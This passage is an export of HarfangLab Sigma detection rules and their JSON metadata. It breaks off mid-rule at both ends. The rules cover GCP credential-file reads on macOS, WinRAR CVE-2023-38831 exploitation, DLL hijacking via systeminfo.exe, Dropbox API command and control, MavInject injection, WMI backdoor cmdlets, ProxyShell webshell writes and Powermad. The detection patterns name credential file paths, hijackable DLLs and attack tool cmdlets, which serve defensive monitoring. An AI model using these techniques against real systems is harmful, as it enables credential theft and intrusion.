https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path: '/Users/*/.config/gcloud/credentials.db'\n ProcessImage|contains: '?'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n exclusion_haxm:\n Image: '/usr/local/haxm/*/haxm'\n ProcessSignatureSigningId: 'Agent_final'\n ProcessSigned: 'true'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2e7c5a05-6c01-4aac-b25c-16ea27b31087", "rule_name": "Suspicious Access to GCP Database File", "rule_description": "Detects an attempt to read the content of the GCP database.\nAdversaries may access a user's GCP database file in order to gather credentials and move to cloud environments.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n", "rule_creation_date": "2024-06-18", "rule_modified_date": "2025-10-29", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1552.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2e91d378-094f-4d0e-8695-ea6539ed28c9", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.084718Z", "creation_date": "2026-03-23T11:45:34.084720Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.084724Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/", "https://nvd.nist.gov/vuln/detail/CVE-2023-38831", "https://attack.mitre.org/techniques/T1203/" ], "name": "t1203_winrar_vulnerability.yml", "content": "title: WinRAR CVE-2023-38831 Vulnerability Exploited\nid: 2e91d378-094f-4d0e-8695-ea6539ed28c9\ndescription: |\n Detects command-lines related to the exploitation of CVE-2023-38831, a vulnerability affecting WinRAR.\n WinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive.\n This vulnerability was exploited in the wild in April through August 2023.\n It is recommended to investigate any child processes and alerts on the affected machine.\nreferences:\n - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-38831\n - https://attack.mitre.org/techniques/T1203/\ndate: 2023/08/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - cve.2023-38831\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2023-38831\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n ParentImage|endswith: '\\Winrar.exe'\n CommandLine|startswith: '?:\\Windows\\system32\\cmd.exe /c ?:\\Users\\\\*\\AppData\\Local\\Temp\\Rar$*\\'\n\n selection_extension:\n CommandLine|endswith:\n - ' .exe'\n - ' .cmd'\n - ' .bat'\n - ' .vbs'\n - ' .wsf'\n - ' .wsh'\n - ' .ps1'\n - ' .js'\n - ' .exe '\n - ' .cmd '\n - ' .bat '\n - ' .vbs '\n - ' .wsf '\n - ' .wsh '\n - ' .ps1 '\n - ' .js '\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2e91d378-094f-4d0e-8695-ea6539ed28c9", "rule_name": "WinRAR CVE-2023-38831 Vulnerability Exploited", "rule_description": "Detects command-lines related to the exploitation of CVE-2023-38831, a vulnerability affecting WinRAR.\nWinRAR before 6.23 allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive.\nThis vulnerability was exploited in the wild in April through August 2023.\nIt is recommended to investigate any child processes and alerts on the affected machine.\n", "rule_creation_date": "2023-08-25", "rule_modified_date": "2025-04-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1203" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2eedf312-fb18-46f6-8ce9-aed5bedd3dd7", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.593612Z", "creation_date": "2026-03-23T11:45:34.593616Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.593623Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_systeminfo.yml", "content": "title: DLL Hijacking via systeminfo.exe\nid: 2eedf312-fb18-46f6-8ce9-aed5bedd3dd7\ndescription: |\n Detects potential Windows DLL Hijacking via systeminfo.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systeminfo.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fastprox.dll'\n - '\\mpr.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2eedf312-fb18-46f6-8ce9-aed5bedd3dd7", "rule_name": "DLL Hijacking via systeminfo.exe", "rule_description": "Detects potential Windows DLL Hijacking via systeminfo.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.602948Z", "creation_date": "2026-03-23T11:45:34.602952Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.602972Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securelist.com/bad-magic-apt/109087/", "https://attack.mitre.org/techniques/T1071/001/" ], "name": "t1071_001_suspicious_url_request_to_dropbox.yml", "content": "title: Suspicious URL Request to the Dropbox API\nid: 2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c\ndescription: |\n Detects suspicious URL requests to the Dropbox API.\n Adversaries can use legitimate webservices to hide malicious command and control traffic.\n The Powermagic malware is known to use the Dropbox API to communicate with the attackers.\n It is recommended to analyze the process performing the URL request to determine whether its network communication to the DropBox API is legitimate.\nreferences:\n - https://securelist.com/bad-magic-apt/109087/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/03/24\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1102.002\n - attack.exfiltration\n - attack.t1567.002\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost:\n - 'content.dropboxapi.com'\n - 'api.dropboxapi.com'\n\n filter_dropbox:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n - 'Dropbox, Inc'\n - 'Piriform Software Ltd'\n\n filter_dropbox_useragent:\n UserAgent|startswith: 'DropboxWindowsApp/'\n\n exclusion_dropboxuniversal:\n ProcessOriginalFileName: 'DropboxUniversal.exe'\n\n exclusion_rekordbox:\n # https://api.dropboxapi.com/2/auth/token/revoke\n ProcessOriginalFileName: 'rekordbox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'AlphaTheta Corporation'\n\n exclusion_totalcmd64:\n ProcessOriginalFileName: 'totalcmd64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ghisler Software GmbH'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2f4b9ca0-a3f3-4e38-a62f-aedbfe8a362c", "rule_name": "Suspicious URL Request to the Dropbox API", "rule_description": "Detects suspicious URL requests to the Dropbox API.\nAdversaries can use legitimate webservices to hide malicious command and control traffic.\nThe Powermagic malware is known to use the Dropbox API to communicate with the attackers.\nIt is recommended to analyze the process performing the URL request to determine whether its network communication to the DropBox API is legitimate.\n", "rule_creation_date": "2023-03-24", "rule_modified_date": "2025-09-23", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.exfiltration" ], "rule_technique_tags": [ "attack.t1071.001", "attack.t1102.002", "attack.t1567.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.615612Z", "creation_date": "2026-03-23T11:45:34.615615Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.615623Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Mavinject/", "https://attack.mitre.org/techniques/T1218/", "https://attack.mitre.org/techniques/T1055/001/" ], "name": "t1218_mavinject.yml", "content": "title: Process Injected via MavInject\nid: 2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3\ndescription: |\n Detects an attempt to open a process by mavinject.exe.\n This can be used by attackers to inject and execute an arbitrary DLL on any processes.\n It is recommended to check process' parents and the opened process for suspicious actions or content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mavinject/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1055/001/\ndate: 2021/06/16\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1055.001\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.Mavinject\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n GrantedAccess: '0x10143a'\n ProcessOriginalFileName:\n - 'mavinject32.exe'\n - 'mavinject64.exe'\n\n exclusion_appvisvsubsystems:\n ProcessCommandLine|contains:\n - '\\AppVIsvSubsystems32.dll'\n - '\\AppVIsvSubsystems64.dll'\n\n exclusion_appv:\n ProcessParentImage: '?:\\Windows\\System32\\AppVClient.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2f78ddbf-ec12-46ef-b5f4-1c5272a8acd3", "rule_name": "Process Injected via MavInject", "rule_description": "Detects an attempt to open a process by mavinject.exe.\nThis can be used by attackers to inject and execute an arbitrary DLL on any processes.\nIt is recommended to check process' parents and the opened process for suspicious actions or content.\n", "rule_creation_date": "2021-06-16", "rule_modified_date": "2025-04-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1055.001", "attack.t1218" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.624544Z", "creation_date": "2026-03-23T11:45:34.624546Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.624550Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/mattifestation/WMI_Backdoor", "https://attack.mitre.org/techniques/T1546/003/", "https://attack.mitre.org/techniques/T1059/001/" ], "name": "t1546_003_wmi_backdoor_trigger_cmdlet.yml", "content": "title: WMIBackdoor PowerShell Cmdlet Executed\nid: 2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b\ndescription: |\n Detects the execution of the WMIBackdoor.ps1 PowerShell script used to create WMI event subscription backdoors.\n This script establishes persistent malicious WMI event consumers that trigger on specific system events, allowing attackers to maintain access and execute arbitrary code.\n WMI event subscriptions are a common persistence mechanism that can survive reboots and are often difficult to detect through standard security tools.\n It is recommended to investigate the WMI event subscriptions on the system via the associated telemetry, analyze the triggered actions and payloads, and review the process tree for the parent process that executed this cmdlet.\nreferences:\n - https://github.com/mattifestation/WMI_Backdoor\n - https://attack.mitre.org/techniques/T1546/003/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2025/11/07\nmodified: 2025/12/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.003\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.WMIBackdoor\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n ScriptBlockText|contains:\n - 'New-WMIBackdoorTrigger'\n - 'New-WMIBackdoorAction'\n - 'Register-WMIBackdoor'\n\n condition: selection\nlevel: high\nconfidence: strong\n\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2f8e4b3a-9c7d-4e6f-8a1b-5d3c9e7f2a4b", "rule_name": "WMIBackdoor PowerShell Cmdlet Executed", "rule_description": "Detects the execution of the WMIBackdoor.ps1 PowerShell script used to create WMI event subscription backdoors.\nThis script establishes persistent malicious WMI event consumers that trigger on specific system events, allowing attackers to maintain access and execute arbitrary code.\nWMI event subscriptions are a common persistence mechanism that can survive reboots and are often difficult to detect through standard security tools.\nIt is recommended to investigate the WMI event subscriptions on the system via the associated telemetry, analyze the triggered actions and payloads, and review the process tree for the parent process that executed this cmdlet.\n", "rule_creation_date": "2025-11-07", "rule_modified_date": "2025-12-08", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1059.001", "attack.t1546.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2f9bedc8-2825-415e-a921-7af30eb2aa12", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.092287Z", "creation_date": "2026-03-23T11:45:34.092289Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.092294Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers", "https://redcanary.com/blog/blackbyte-ransomware/", "https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/", "https://attack.mitre.org/techniques/T1190/", "https://attack.mitre.org/techniques/T1505/003/" ], "name": "t1190_proxyshell_vulnerability_exploitation.yml", "content": "title: Microsoft Exchange Server Vulnerability Exploitation\nid: 2f9bedc8-2825-415e-a921-7af30eb2aa12\ndescription: |\n Detects a possible exploitation of CVE-2021-31207 (aka ProxyShell) related to Microsoft Exchange server, that allows an attacker to write files to the system.\n The ProxyShell vulnerabilities consist of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting on-premises Microsoft Exchange servers that allow attackers to perform a pre-authenticated remote code execution.\n It is recommended to analyze the files written to disk to look for webshells or any suspicious content.\nreferences:\n - https://www.mandiant.com/resources/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2022/07/08\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.persistence\n - attack.t1505.003\n - cve.2021-31207\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.Exchange\n - classification.Windows.Exploit.ProxyShell\n - classification.Windows.Exploit.CVE-2021-34473\n - classification.Windows.Exploit.CVE-2021-34523\n - classification.Windows.Exploit.CVE-2021-31207\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\MSExchangeMailboxReplication.exe'\n Path|endswith:\n - '.aspx'\n - '.asp'\n - '.ashx'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2f9bedc8-2825-415e-a921-7af30eb2aa12", "rule_name": "Microsoft Exchange Server Vulnerability Exploitation", "rule_description": "Detects a possible exploitation of CVE-2021-31207 (aka ProxyShell) related to Microsoft Exchange server, that allows an attacker to write files to the system.\nThe ProxyShell vulnerabilities consist of three vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting on-premises Microsoft Exchange servers that allow attackers to perform a pre-authenticated remote code execution.\nIt is recommended to analyze the files written to disk to look for webshells or any suspicious content.\n", "rule_creation_date": "2022-07-08", "rule_modified_date": "2025-04-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.initial_access", "attack.persistence" ], "rule_technique_tags": [ "attack.t1190", "attack.t1505.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2fd97120-c808-466a-81ed-6aabf72403a2", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.604632Z", "creation_date": "2026-03-23T11:45:34.604636Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.604643Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/Kevin-Robertson/Powermad", "https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/", "https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/", "https://attack.mitre.org/techniques/T1059/001/", "https://attack.mitre.org/techniques/T1557/001/" ], "name": "t1059_001_powershell_malicious_cmdlet_powermad_cmd.yml", "content": "title: Malicious PowerShell Powermad Commandlets in Command-line\nid: 2fd97120-c808-466a-81ed-6aabf72403a2\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad framework.\n The Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\n It is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the PowerShell host process.\nreferences:\n - https://github.com/Kevin-Robertson/Powermad\n - https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/\n - https://www.netspi.com/blog/technical/network-penetration-testing/machineaccountquota-transitive-quota/\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1557/001/\ndate: 2022/10/12\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.credential_access\n - attack.collection\n - attack.t1557.001\n - attack.defense_evasion\n - attack.t1550.002\n - attack.persistence\n - attack.privilege_escalation\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerMad\nlogsource:\n category: process_creation\n product: windows\ndetection:\n 